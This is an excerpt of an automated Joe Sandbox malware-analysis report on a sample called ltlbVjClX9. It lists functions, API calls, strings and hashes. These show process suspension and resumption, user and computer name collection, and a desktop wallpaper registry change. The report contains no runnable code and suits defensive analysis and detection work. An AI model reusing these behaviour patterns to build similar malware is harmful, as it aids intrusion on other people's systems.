Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
Opcode Fuzzy Hash: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD

Function 0041BB09 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00415FFF,00000000), ref: 0041BB14
NtSuspendProcess.NTDLL(00000000), ref: 0041BB21
CloseHandle.KERNEL32(00000000,?,?,00415FFF,00000000), ref: 0041BB2A

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpenSuspend
String ID:
API String ID: 1999457699-0
Opcode ID: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
Instruction ID: bc08a5c74f7a636e8823ed9fed2a710289fdff4cb0149baf3e3f1c1580a6a9c0
Opcode Fuzzy Hash: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
Instruction Fuzzy Hash: 96D05E36204231E3C32017AA7C0CE97AD68EFC5AA2705412AF804C26649B20CC01C6E8

Function 0041BB35 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00416024,00000000), ref: 0041BB40
NtResumeProcess.NTDLL(00000000), ref: 0041BB4D
CloseHandle.KERNEL32(00000000,?,?,00416024,00000000), ref: 0041BB56

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpenResume
String ID:
API String ID: 3614150671-0
Opcode ID: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
Instruction ID: 907c56f48a3137ad3e5a70bb4b43f8813844e3fa30c0a1486a2e097c633c30d6
Opcode Fuzzy Hash: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
Instruction Fuzzy Hash: B8D05E36104121E3C220176A7C0CD97AE69EBC5AA2705412AF904C32619B20CC01C6F4

Function 0213092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 0213095F
GetProcAddress., xrefs: 021309DC, 021309DF, 021309E4
l, xrefs: 02130966

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 3836c2c0c9d7d0588d79a54d7fb2a89bb352c49fe921cc1f55db2b8726cc0980
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 51314CB6940609DFDB11CF99C880AAEBBF6FF48324F15404AD445AB310D771EA45CFA4

Function 0045332B Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,000000FF,?,00000008,PkGNG,PkGNG,00453326,000000FF,?,00000008,?,?,004561DD,00000000), ref: 00453558

Strings

PkGNG, xrefs: 0045332D, 00453335

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID: PkGNG
API String ID: 3997070919-263838557
Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
Instruction ID: ef9cfcefdd20db456822e604066c987cb5d00f1002a97bdaec88d2537339d9b1
Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
Instruction Fuzzy Hash: 40B16C311106089FD715CF28C48AB657BE0FF053A6F258659EC9ACF3A2C739DA96CB44

Function 00434C52 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B

Strings

, xrefs: 00434DD2

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-3916222277
Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94

Function 0217EAE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0217EC73

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
Instruction ID: d36cdc8bd401e87b994807fd4ac3804685ca061aee4f09f28c6925aea3ced1c6
Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
Instruction Fuzzy Hash: E731E471940259AFCB349E78CC88EFA7BFEDB85318F1405E8E81997290E73199458B50

Function 0044E879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0044EA0C

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54

Function 0214CC49 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0214CD3E

Part of subcall function 021439D6: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 021439E5
Part of subcall function 021439D6: RegSetValueExA.ADVAPI32(0046611C,0046CBB8,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0214CD18,0046CBB8,0046611C,00000001,00474EE0,00000000), ref: 02143A0D
Part of subcall function 021439D6: RegCloseKey.ADVAPI32(0046611C,?,?,0214CD18,0046CBB8,0046611C,00000001,00474EE0,00000000,?,021389C4,00000001), ref: 02143A18

Strings

Control Panel\Desktop, xrefs: 0214CC84, 0214CCB7, 0214CD07

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop
API String ID: 4127273184-27424756
Opcode ID: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
Instruction ID: a647cffe7a4b30dc68e6b0fddff24728a8766ba8c7fa13340ea5d63ec09032ad
Opcode Fuzzy Hash: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
Instruction Fuzzy Hash: 7511AF32BC024037E91831395D6BF7D2803A347F20F92415BEA1A2A6D6FE8B0B4147CB

Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082

Strings

lJD, xrefs: 0045203B

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: lJD
API String ID: 1084509184-3316369744
Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604

Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940

Strings

GetLocaleInfoEx, xrefs: 00448908

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
Opcode Fuzzy Hash: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E

Function 02176457 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a96b7609790ac4739cbc98a3d16eee944d9dca73ec27410e05b772870dacd41b
Instruction ID: 61faea6be6f5f5971e6e5b0d37b473f6edc5db5cac48c048449b22a7b3c7c27d
Opcode Fuzzy Hash: a96b7609790ac4739cbc98a3d16eee944d9dca73ec27410e05b772870dacd41b
Instruction Fuzzy Hash: FC024C71E406599FDF18CFA9C8806ADBBF5EF88324F258269D919E7384D731A941CF80

Function 0041B60D Relevance: 3.0, APIs: 2, Instructions: 41COMMON

Download Yara Rule

APIs

GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B62A
GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Name$ComputerUser
String ID:
API String ID: 4229901323-0
Opcode ID: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
Opcode Fuzzy Hash: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8

Function 0041DB62 Relevance: 2.8, Strings: 2, Instructions: 277COMMON

Download Yara Rule

Strings

A, xrefs: 0041DE94
PkGNG, xrefs: 0041DB63

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: PkGNG$A
API String ID: 0-652289354
Opcode ID: 5bd247f65566e5dcac570d963c8fc58fd9122a78ba50124b87c8ae73a408a6cb
Instruction ID: 79373b44a76dcf5e8091c0b891bec819a00bcae964dee749e010b71610d2b526
Opcode Fuzzy Hash: 5bd247f65566e5dcac570d963c8fc58fd9122a78ba50124b87c8ae73a408a6cb
Instruction Fuzzy Hash: F7B1A5795142998ACF05EF28C4913F63BA1EF6A300F4851B9EC9DCF757D2398506EB24

Function 00412077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
HeapFree.KERNEL32(00000000), ref: 004120EE

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
Opcode Fuzzy Hash: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58

Function 02183592 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0218358D,?,?,00000008,?,?,02186444,00000000), ref: 021837BF

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
Instruction ID: e226393c406657fc78724cf16b8cf298a3f782b18185e44279456a2290d302e8
Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
Instruction Fuzzy Hash: 40B15D715506099FD719DF28C4CAB647BE0FF45768F298698E8AACF2A1C335D982CF40

Function 02163BAD Relevance: 1.8, Strings: 1, Instructions: 501COMMON

Download Yara Rule

Strings

0, xrefs: 02163BB9

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 1f1efbfc6b98b7ff63776831a751ef1758ce1d1abb45475947e68a2c5420a09b
Instruction ID: 5a7efb42cdda580a42e79be7e7ebab4e74016d2a27a8fc0c586c20a3fd0f99df
Opcode Fuzzy Hash: 1f1efbfc6b98b7ff63776831a751ef1758ce1d1abb45475947e68a2c5420a09b
Instruction Fuzzy Hash: 45127B32A483008FD304DF69D841A2FB3E2BFC8B54F15896DE495EB390DB75E8159B92

Function 00433946 Relevance: 1.8, Strings: 1, Instructions: 501COMMON

Download Yara Rule

Strings

0, xrefs: 00433952

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 1f1efbfc6b98b7ff63776831a751ef1758ce1d1abb45475947e68a2c5420a09b
Instruction ID: aa2317f629b7fe23c078ec1ce6c5eb8ae6c7f7e5ba67e2b2e47e92e01b9ebfde
Opcode Fuzzy Hash: 1f1efbfc6b98b7ff63776831a751ef1758ce1d1abb45475947e68a2c5420a09b
Instruction Fuzzy Hash: A4126F32B083008BD714EF6AD851A1FB3E2BFCC758F15892EF585A7391DA34E9058B46

Function 02157604 Relevance: 1.7, Strings: 1, Instructions: 435COMMON

Download Yara Rule

Strings

PkGNG, xrefs: 02157606

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: PkGNG
API String ID: 0-263838557
Opcode ID: c9aaf453693c51d24ca7a3c4a4ceab2933bddcf98470505b98e2a27e306b013f
Instruction ID: d9c255410087902896d211e3d10fb9909f1d1f38601dc954a803e27fc1b3fdac
Opcode Fuzzy Hash: c9aaf453693c51d24ca7a3c4a4ceab2933bddcf98470505b98e2a27e306b013f
Instruction Fuzzy Hash: E402AE717146529BC318CF2EEC8053AB7E1BB8D301744863EE895CB795EB74E922CB94

Function 0042739D Relevance: 1.7, Strings: 1, Instructions: 435COMMON

Download Yara Rule

Strings

PkGNG, xrefs: 0042739F

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: PkGNG
API String ID: 0-263838557
Opcode ID: c9aaf453693c51d24ca7a3c4a4ceab2933bddcf98470505b98e2a27e306b013f
Instruction ID: c5d71c01a3a4c2ba568a1e95f45065819b1df519d68335ab1a8a94a68da0c1ef
Opcode Fuzzy Hash: c9aaf453693c51d24ca7a3c4a4ceab2933bddcf98470505b98e2a27e306b013f
Instruction Fuzzy Hash: 1002BFB17146519BC318CF2EEC8053AB7E1BB8D301745863EE495C7795EB34E922CB98

Function 02157075 Relevance: 1.6, Strings: 1, Instructions: 383COMMON

Download Yara Rule

Strings

PkGNG, xrefs: 02157078

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: PkGNG
API String ID: 0-263838557
Opcode ID: 48ded03eed404aecddfdc941b80cfcbb47281dee009c44b5841c296122d26843
Instruction ID: 16689170cd12ee4eb441c818f06909eb451c7a0eb4b2ff3cfde779e09fe3f36d
Opcode Fuzzy Hash: 48ded03eed404aecddfdc941b80cfcbb47281dee009c44b5841c296122d26843
Instruction Fuzzy Hash: 29F16C756142559FC304CF2DE89187AB3E5FB89301B440A2EF5C2C7391DB78EA16CB96

Function 0218257A Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0217847C: GetLastError.KERNEL32(?,0216F987,0216AA5C,0216F987,00474EF8,PkGNG,0216D07C,FF8BC35D,00474EF8,00474EF8), ref: 02178480
Part of subcall function 0217847C: _free.LIBCMT ref: 021784B3
Part of subcall function 0217847C: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 021784F4
Part of subcall function 0217847C: _abort.LIBCMT ref: 021784FA

Part of subcall function 0217847C: _free.LIBCMT ref: 021784DB
Part of subcall function 0217847C: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 021784E8

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 021825CE

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 1c78d64a9fd66d396f75fc23132baf9b4c9517b751e53961a843368791b75c78
Instruction ID: b2c849e8973fa2688a0f4975ba177c049ef3b47b7089cc31f2552c063285a067
Opcode Fuzzy Hash: 1c78d64a9fd66d396f75fc23132baf9b4c9517b751e53961a843368791b75c78
Instruction Fuzzy Hash: 5C21C572591286AFDB25BF28CC85BBA77ADEB08324F1001BAED01C6140EB749D40CF94

Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58

Function 02182202 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0217847C: GetLastError.KERNEL32(?,0216F987,0216AA5C,0216F987,00474EF8,PkGNG,0216D07C,FF8BC35D,00474EF8,00474EF8), ref: 02178480
Part of subcall function 0217847C: _free.LIBCMT ref: 021784B3
Part of subcall function 0217847C: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 021784F4
Part of subcall function 0217847C: _abort.LIBCMT ref: 021784FA

EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,02174CD3,?,02182957,00000000,?,?,?), ref: 02182274

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
Instruction ID: fa4dee0ed898c77e71841ad9a6be225833cbf639565231899cdfdd10619b718b
Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
Instruction Fuzzy Hash: CC11293B2447015FDB18AF38C8D067AB792FF84369B14482DDD4747A40D371B402CB40

Function 021827AA Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 0217847C: GetLastError.KERNEL32(?,0216F987,0216AA5C,0216F987,00474EF8,PkGNG,0216D07C,FF8BC35D,00474EF8,00474EF8), ref: 02178480
Part of subcall function 0217847C: _free.LIBCMT ref: 021784B3
Part of subcall function 0217847C: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 021784F4
Part of subcall function 0217847C: _abort.LIBCMT ref: 021784FA

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,02182548,00000000,00000000,?), ref: 021827D6

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
Instruction ID: 024729bffe1c9c0651b1a5200edc3c56f5de9f285ecb649f04287c312aa68adf
Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
Instruction Fuzzy Hash: 4CF0F936980155BBDB296B25CC85BBA77A8EB40764F154479EC05A3180EB74BD41CEA0

Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
